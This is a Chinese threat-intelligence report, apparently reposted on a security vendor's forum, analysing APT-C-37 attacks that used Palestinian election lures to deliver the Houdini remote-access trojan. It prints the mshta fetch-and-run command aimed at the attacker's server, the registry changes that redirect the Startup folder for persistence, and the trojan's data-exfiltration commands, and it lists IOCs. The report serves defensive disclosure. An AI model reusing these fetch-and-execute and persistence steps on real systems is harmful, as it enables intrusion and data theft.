瑞星卡卡安全论坛

一、背景介绍

近日，瑞星威胁情报中心捕获到两起针对巴勒斯坦大选的APT攻击事件，通过对攻击手法的分析来看，发现这两起攻击均与APT组织“APT-C-37”（又称“拍拍熊”）有关。该组织通过投放伪装成巴勒斯坦选举会议的相关文档等方式进行远程控制攻击，其意图以攻击巴勒斯坦政府为主，目的在于影响巴勒斯坦国家大选。

据悉，“拍拍熊”是一个中东地区背景，使用阿拉伯语且有政治动机的APT攻击组织，自2015年被发现至今，频繁进行有组织、有计划、针对性的不间断攻击，特别是针对巴勒斯坦、以色列、埃及等中东动乱国家进行攻击。“拍拍熊”组织一直保持着积极的活跃度，典型的攻击目标包括政府机构、武装组织领导、媒体人士、政治活动家和外交官等。

瑞星安全专家介绍，此次截获的APT攻击事件应与近期的巴勒斯坦大选有关，通过截获的两起诱饵文件发现，其主题为选举委员会会议和Majdalani严重怀疑阿巴斯总统关于总统选举。攻击者将带有木马病毒的诱饵文档通过邮件等方式进行投放，而该病毒可自解压，一旦受害者运行了自解压的木马文件，就会被攻击者远程控制，从而可进行各种不法操作。

由于“拍拍熊”组织针对的目标都是具有重大信息资产，如国家军事、情报、战略部门，以及如金融、能源等影响国计民生的行业，因此国内相关政府机构和企业单位务必要引起重视，加强防御措施。

二、攻击事件

这两起攻击事件均是针对巴勒斯坦，攻击者投放的诱饵文档都和巴勒斯坦大选有关。第一个诱饵文档的主题是：选举委员会会议。第二个诱饵文档的主题是：Majdalani严重怀疑阿巴斯总统关于总统选举。

图：诱饵文档1

图：诱饵文档2

三、技术分析

3.1 攻击流程

图：攻击流程

3.2 自解压文件


攻击者投放的病毒样本为SFX（自解压）文件，并且图标被伪装成WORD图标。在自解压文件中有一个和巴勒斯坦大选相关的诱饵文档和一段自解压命令。

文件名	اجتماع لجنة الانتخابات – إقليم الشمال .exe
中文翻译	选举委员会会议-北领地.exe
MD5	6E62856152EB198B457487E1EED94D76
文件大小	396.71KB（406234 bytes）
文件格式	Win32 EXE
创建时间	2019-4-27
VT首次上传时间	2019-11-05
VT检测结果	37 / 70
涉及URL	http://192.119.111.4/xx/dv
内含诱饵文档名	GSHword.docx

表：自解压文件1信息

图：自解压文件1

文件名	المجدلاني يشكك بجدية الرئيس عباس بشأن الانتخابات الرئاسية.exe
中文翻译	Majdalani严重怀疑阿巴斯总统关于总统选举.exe
MD5	4FA306739FD3ECC75B0EE202A614061D
文件大小	389.28KB （398627bytes）
文件格式	Win32 EXE
创建时间	2019-4-27
VT首次上传时间	2019-11-07
VT检测结果	27 / 70
涉及URL	http://192.119.111.4/xx/dv
内含诱饵文档名	wordwatan.docx

表：自解压文件2信息

图：自解压文件2

自解压命令：

通过分析自解压命令，可以得知当受害者运行自解压文件后，病毒样本会执行如下操作：

图：自解压命令

①攻击者为了达到迷惑受害者的目的，会先将诱饵文档释放在%temp%路径下，并打开。

文件名	GSHword.docx
MD5	D99F2923C81E703C6345D30BF0E15CD9
所处目录	%temp%
VT检测结果	0 / 59

表：诱饵文档1：GSHword.docx的信息

文件名	wordwatan.docx
MD5	7E55C6E273FE45336299A7AAA46D5A2B
所处目录	%temp%
VT检测结果	0 / 62

表：诱饵文档2：wordwatan.docx的信息

②利用mshta.exe执行http://192.119.111.4/xx/dv脚本。

③为了使得攻击保持持久性，攻击者在启动菜单中下创建一个LNK文件。此LNK文件被伪装成HelPPane.lnk（windows自带帮助程序），但是它的目标属性指向：C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv。

文件名	HelPPane.lnk
MD5	F4355A61D7AC60D3282A9A207A643589
目标属性	C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv
所处目录	%appdata% \Microsoft\Windows\Start Menu\Programs\Startup
VT检测结果	样本无上报

表：HelPPane.lnk 信息

图：HelPPane.lnk的目标属性

3.3 dv.vbs

来源	http://192.119.111.4/xx/dv
MD5	7BCBE8CC5A05DF9FCEA4E7E52BD00D79
执行方式	C:\Windows\System32\mshta.exe http://192.119.111.4/xx/dv
涉及URL	http://192.119.111.4/xx/dv.zip

表：dv.vbs 信息

如下是dv.vbs执行的恶意操作：

①在%temp%目录中创建xxxx.tmp（xxxx表示随机命名）。

②从http://192.119.111.4/xx/dv.zip中获取vbs脚本并存于xxxx.tmp中。

③将xxxx.tmp文件的后缀名改为vbs，利用powershell.exe执行xxxx.vbs。

④最后将xxxx.vbs文件删除。

图：dv.vbs脚本文件

3.4 dv.zip.vbs

文件名	xxxx.tmp（xxxx表示随机命名）
MD5	9094DF33AA0D6B1DD4EFAF34E91A05C4
所处目录	%temp%
来源	http://192.119.111.4/xx/dv.zip
涉及URL	http://192.119.111.4/xx/f_Skoifa.vbs

表：dv.zip.vbs 信息

如下是dv.zip.vbs执行的恶意操作：

3.4.1 下载f_Skoifa.vbs脚本

下载http://192.119.111.4/xx/f_Skoifa.vbs脚本文件，存于%USERPROFILE%\AppData\Local中。

文件名	f_Skoifa.vbs
MD5	FD5BA76F85C9746F7A326B954874F5A6
所处目录	%USERPROFILE%\AppData\Local
来源	http://192.119.111.4/xx/f_Skoifa.vbs

表：f_Skoifa.vbs 信息

图：下载f_Skoifa.vbs

3.4.2 创建Help文件夹

判断%USERPROFILE%\AppData\Roaming\Microsoft\Windows\中是否存在Help文件夹，没有则创建。

文件名	Help
所处目录	%USERPROFILE%\AppData\Roaming\Microsoft\Windows
子文件	HelpPane.lnk

表：Help 信息

图：创建Help文件夹

3.4.3 转移启动菜单为Help文件夹

（1）在注册表HKEY_CURRENT_USER中创建 SOFTWARE\Microsoft\Windows\CurrentVersion\Help。

（2）更改Windows启动目录为Help文件夹：

①在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders中的Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help 。

②在注册表HKEY_CURRENT_USER中修改 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders中的Startup值为%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help。

图：更改注册表

3.4.4 创建指向f_Skoifa.vbs 的HelpPane.lnk

在%USERPROFILE%\AppData\Roaming\Microsoft\Windows\help文件夹中创建一个LNK文件。此LNK文件被伪装成HelpPane.lnk（windows自带帮助程序），它的属性目标指向C:\Windows\system32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs。

文件名	HelpPane.lnk
MD5	2818ECDE79CEDC1E181D7B69F14840A6
目标属性	C:\Windows\System32\wscript.exe %USERPROFILE%\AppData\Local\f_Skoifa.vbs
所处目录	%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Help
VT检测结果	样本无上报

表：HelpPane.lnk 信息

图：创建快捷方式文件

3.4.5 更改f_Skoifa.vbs和HelpPane.lnk的文件属性

攻击者为了保持持久性，将%USERPROFILE%\AppData\Local\ f_Skoifa.vbs和%USERPROFILE%\AppData\Roaming\Microsoft\Windows\help\HelpPane.lnk的文件属性更改为系统属性和隐藏属性。

图：更改文件属性

3.5 f_Skoifa.vbs

f_Skoifa.vbs是个被加密的远控木马，解密后对其进行技术分析发现其就是远控木马Houdini。

文件名	f_Skoifa.vbs
MD5	FD5BA76F85C9746F7A326B954874F5A6
所处目录	%USERPROFILE%\AppData\Local
来源	http://192.119.111.4/xx/f_Skoifa.vbs
涉及URL	http://192.119.111.4:4587/is-ready http:// 192.119.111.4:4587 / is-enum-driver http:// 192.119.111.4:4587 / is-sending http:// 192.119.111.4:4587 / is-enum-faf http:// 192.119.111.4:4587 / is-enum-process

表：_Skoifa.vbs 信息

图：f_Skoifa.vbs密文

图：f_Skoifa.vbs明文

如下是f_Skoifa.vbs的详细分析：

3.5.1远控指令分析

样本首先和C2地址http://192.119.111.4:4587/is-ready建立连接，然后使用WMI的WQL语句来获取受害者机器上的有效信息，将信息发送到C2地址上。接着等待攻击者响应，将远控指令发送到受害者机器上以便进行下一步恶意操作。

发送信息的记录结构为：

逻辑磁盘卷序列号<|>电脑名<|>用户名<|>操作系统版本<|>plus<|>防病毒产品名（如果没有防病毒产品，则记录为nan-av）。例如："7FC8F3B9<|>123-PC<|>Administrator<|>Microsoft Windows 7 旗舰版 <|>plus<|>nan-av<|>"。

图：发送信息和接收远控指令

3.5.2 八个远控指令名分析

攻击者发送过来的远控木马的攻击指令总计8个，每个远控指令的结构为：

远控指令名<|>指令参数1（<|>指令参数2）。样本从远控指令中解析出远控指令名，然后根据远控指令名对受害者机器发动相应地攻击。


下面分别对这8个远控指令名进行详细分析。

图：远控指令

①远控指令名：excecute

调用VBScript中的execute函数，直接执行指令参数1。指令参数1可以是一段pwoershell或其他。

图：远控指令名excecute

②远控指令名：send

远控指令名send的作用是下载文件以执行。
远控指令名send对应的远控指令结构为：

send<|>fileurl<|>filedir。包含两个指令参数，指令参数1表示C2地址的文件路径，指令参数2表示受害者机器上的文件目录。数据传输方式为POST，从http:// 192.119.111.4:4587 / is-sending<|> fileurl（指令参数1）中获取文件，文件命名为fileurl（指令参数1）斜线（\）后的字符。文件存储于filedir（指令参数2）中。


下载前判断受害者机器上是否存在被下载的文件，如果存在则将其删除，然后重新下载，下载完后利用wscript.shell将文件执行起来。

图：远控指令名send

图：远控指令名send对应的操作函数

③远控指令名：recv

此次攻击中，远控指令名recv的对应的操作函数upload并不存在。但是从之前的攻击案例中可以得知，这个远控指令的作用是更新载荷。

图：远控指令名recv

④远控指令名：enum-driver

远控指令名enum-driver的作用是向C2地址（http:// 192.119.111.4:4587 / is-enum-driver）发送由受害者机器上的磁盘信息组成的列表。
发送列表的记录结构为：

磁盘1路径|磁盘1类型<|>（磁盘2路径|磁盘2类型<|>……磁盘n路径|磁盘n类型<|>）。

图：远控指令名enum-driver

图：远控指令名enum-driver对应的操作函数

⑤远控指令名：enum-faf

远控指令名enum-faf的作用是向C2地址（http:// 192.119.111.4:4587 / is-enum-faf）发送由指定文件（指令参数1）下的文件夹信息和文件信息组成的列表。
发送列表的记录结构为：

指定文件 <|>子文件夹1的名称｜｜d｜子文件夹1的属性<|>……<|>子文件夹n的名称｜｜d｜子文件夹n的属性<|>子文件1的名称｜子文件1的大小｜f｜子文件1的属性<|>……子文件n的名称｜子文件n的大小｜f｜子文件n的属性<|>。

图：远控指令名enum-faf

图：远控命令enum-faf对应的操作函数

⑥远控指令名：enum-process

远控指令名enum-process对应的作用是向C2地址（http:// 192.119.111.4:4587 / is-enum-process）发送由受害者机器上的进程名，进程ID和进程对应的可执行文件路径组成的列表。


发送列表的记录结构为：

进程1的名称｜进程1的ID｜进程1对应的可执行文件地址<|>……进程n的名称｜进程n的ID｜进程n对应的可执行文件地址<|>。

图：远控指令名enum-process

图：远控指令名enum-process对应的函数操作

⑦远控指令名：delete

此次攻击中，远控指令名delete对应的操作函数deletefaf并不存在。但是通过分析之前的案例可以得知这个指令的作用是删除文件。

图：远控指令名delete

⑧远控指令名：exit-process

远控指令名exit-process的作用是通过进程ID（指令参数1）终止指定进程。

图：远控指令名exit-process

图：远控指令名exit-process对应的操作函数

四、总结

此次最新的攻击案例中涉及到的攻击手法和今年其他相关安全厂商披露的攻击事件中所用到的技术有很大的重合性。攻击者熟练使用阿拉伯语，针对目标为巴勒斯坦，攻击手法采用SFX（自解压文件）和mshta.exe去远程执行脚本文件，最终投递Houdini远控木马。

APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征，针对的目标都是具有重大信息资产，如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等，国内相关政府机构和企业单位务必要引起重视，加强防御措施。

五、预防措施

1.不打开可疑邮件，不下载可疑附件。

此类攻击最开始的入口通常都是钓鱼邮件，钓鱼邮件非常具有迷惑性，因此需要用户提高警惕，企业更是要加强员工网络安全意识的培训。

2.部署网络安全态势感知、预警系统等网关安全产品。

网关安全产品可利用威胁情报追溯威胁行为轨迹，帮助用户进行威胁行为分析、定位威胁源和目的，追溯攻击的手段和路径，从源头解决网络威胁，最大范围内发现被攻击的节点，帮助企业更快响应和处理。

3.安装有效的杀毒软件，拦截查杀恶意文档和木马病毒。

杀毒软件可拦截恶意文档和木马病毒，如果用户不小心下载了恶意文档，杀毒软件可拦截查杀，阻止病毒运行，保护用户的终端安全。

4.及时修补系统补丁和重要软件的补丁。

六、IOC信息

URL

http://192.119.111.4/xx/dv
http://192.119.111.4/xx/dv.zip
http://192.119.111.4/xx/f_Skoifa.vbs
http://192.119.111.4:4587/is-ready
http://192.119.111.4:4587 / is-enum-driver
http://192.119.111.4:4587 / is-sending
http://192.119.111.4:4587 / is-enum-faf
http://192.119.111.4:4587 / is-enum-process

MD5

6E62856152EB198B457487E1EED94D76
7BCBE8CC5A05DF9FCEA4E7E52BD00D79
9094DF33AA0D6B1DD4EFAF34E91A05C4
FD5BA76F85C9746F7A326B954874F5A6
4FA306739FD3ECC75B0EE202A614061D
2818ECDE79CEDC1E181D7B69F14840A6
F4355A61D7AC60D3282A9A207A643589

普通用户分辨不了假冒文档:kaka12:

是滴，留给杀毒软件搞定就行

普通用户不安装杀毒软件 ，即便安装了，弹出的提示也是点击允许运行，点击加入白名单

因为人家太想打开这个文件看看到底是什么嘛

你各家杀毒软件老干扰我工作噶啥呀:kaka14:

:kaka12: :kaka16:

你身边人这样的:kaka2: 那恐怕是因为他们身边有你，中了招找天月呗，有啥可紧张的:kaka16: